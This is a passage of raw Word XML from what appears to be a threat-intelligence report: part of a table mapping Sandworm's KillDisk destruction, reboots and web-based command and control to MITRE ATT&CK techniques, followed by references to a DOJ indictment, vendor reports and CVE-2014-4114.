          <w:p w14:paraId="21CF79EF" w14:textId="0F632531" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00947D5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidR="00947D5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Sandworm used destructive software </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00947D5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Killdis</w:t>
            </w:r>
            <w:r w:rsidR="00CB3651">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>k</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947D5E" w:rsidRPr="0062544E" w14:paraId="0113FE1A" w14:textId="77777777" w:rsidTr="009672B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27986476" w14:textId="66A1BB44" w:rsidR="00947D5E" w:rsidRPr="0062544E" w:rsidRDefault="00947D5E" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00FA713A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C52D298" w14:textId="77777777" w:rsidR="00947D5E" w:rsidRPr="0062544E" w:rsidRDefault="00947D5E" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0040 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3065CEE3" w14:textId="77777777" w:rsidR="00947D5E" w:rsidRPr="0062544E" w:rsidRDefault="00947D5E" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1485 Data Destruction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CBEA0BF" w14:textId="67D87290" w:rsidR="00947D5E" w:rsidRPr="0062544E" w:rsidRDefault="00FA713A" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4829A7C3" w14:textId="77777777" w:rsidR="00947D5E" w:rsidRPr="0062544E" w:rsidRDefault="00947D5E" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0115BEA8" w14:textId="77777777" w:rsidR="00947D5E" w:rsidRPr="0062544E" w:rsidRDefault="00947D5E" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A3FEC34" w14:textId="6F277E49" w:rsidR="00947D5E" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00D77C34">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>-TMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41555112" w14:textId="29088279" w:rsidR="00947D5E" w:rsidRPr="0062544E" w:rsidRDefault="00947D5E" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB3651">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r w:rsidR="00CB3651" w:rsidRPr="00CB3651">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Delete computer event logs and other files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="002D1D50" w14:paraId="2DD81EE6" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71680526" w14:textId="61E41A30" w:rsidR="0024244B" w:rsidRDefault="00CB3651" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00FA713A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E9A7CDD" w14:textId="1D974271" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0040 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47B50014" w14:textId="26BDCBF3" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE5FA6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1529 System Shutdown/Reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05D0D849" w14:textId="58292948" w:rsidR="0024244B" w:rsidRDefault="00FA713A" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19CB1F5D" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D27372F" w14:textId="4E40DA3A" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA713A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="380613E7" w14:textId="6DC54882" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="00E32B30" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00D77C34">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-TMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C366546" w14:textId="149E8910" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="00CB3651" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] Reboot infected computers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="002D1D50" w14:paraId="7D49A0F3" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B790295" w14:textId="77777777" w:rsidR="0024244B" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C64F1C9" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="679C75F9" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7866B602" w14:textId="77777777" w:rsidR="0024244B" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0884A319" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E4953A1" w14:textId="3E21877F" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="176161CA" w14:textId="5F2374EB" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DF14DFD" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF1180" w:rsidRPr="002D1D50" w14:paraId="19948E84" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="225C23AA" w14:textId="5D307E36" w:rsidR="00EF1180" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43D0FA56" w14:textId="311C2CB0" w:rsidR="00EF1180" w:rsidRPr="002D1D50" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43209D51" w14:textId="20EB1A6E" w:rsidR="00EF1180" w:rsidRPr="002D1D50" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="554011BA" w14:textId="5B4BA772" w:rsidR="00EF1180" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F4FC97" w14:textId="77777777" w:rsidR="00EF1180" w:rsidRPr="002D1D50" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="728AF588" w14:textId="1D49B708" w:rsidR="00EF1180" w:rsidRPr="002D1D50" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57FA69F3" w14:textId="2FFF667A" w:rsidR="00EF1180" w:rsidRPr="002D1D50" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E32B30">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CBF7FBF" w14:textId="159D0798" w:rsidR="00EF1180" w:rsidRPr="002D1D50" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Added to tidy Markov transition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13134BA8" w14:textId="77777777" w:rsidR="00706361" w:rsidRPr="0077286F" w:rsidRDefault="00706361" w:rsidP="00706361"/>
    <w:p w14:paraId="664A1610" w14:textId="77777777" w:rsidR="00706361" w:rsidRPr="00C94979" w:rsidRDefault="00706361" w:rsidP="00706361"/>
    <w:p w14:paraId="433D6032" w14:textId="66AC25E3" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00706361">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F5E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1566.001 Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F5E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F5E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7536566B" w14:textId="295E2D57" w:rsidR="0078504F" w:rsidRDefault="0078504F" w:rsidP="00706361">
      <w:r w:rsidRPr="0078504F">
        <w:lastRenderedPageBreak/>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId167" w:history="1">
        <w:r w:rsidR="00833514">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Six Russian GRU Officers Charged in Connection with Worldwide Deployment of Destructive Malware and Other Disruptive Actions in Cyberspace: Unsealed Indictment (justice.gov)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DD4111">
        <w:t xml:space="preserve"> [2020]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFE35DA" w14:textId="5B730D12" w:rsidR="001E2EDA" w:rsidRDefault="001E2EDA" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId168" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Sandworm Zero Day Vulnerability | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>iSIGHT</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Partners (archive.org)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2014]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C95569" w14:textId="6AFD355F" w:rsidR="003A0981" w:rsidRDefault="003A0981" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId169" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Overview of the Cyber Weapons Used in the Ukraine - Russia War | Trustwave</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2022]</w:t>
      </w:r>
      <w:r w:rsidR="006B7807">
        <w:t xml:space="preserve"> (via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B7807">
        <w:t>Malpedia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B7807">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF56D3C" w14:textId="27B545F4" w:rsidR="00E27C1B" w:rsidRDefault="00E27C1B" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId170" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure | CISA</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2022] </w:t>
      </w:r>
      <w:r w:rsidR="001F7994">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Malpedia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F7994">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70496AFE" w14:textId="4A35C134" w:rsidR="00962FD1" w:rsidRDefault="00962FD1" w:rsidP="00706361">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId171" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE - CVE-2014-4114 (mitre.org)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00230FE4">
        <w:t xml:space="preserve"> (via Google)</w:t>
      </w:r>
      <w:r w:rsidR="00E8010A">
        <w:t xml:space="preserve"> [2014]</w:t>
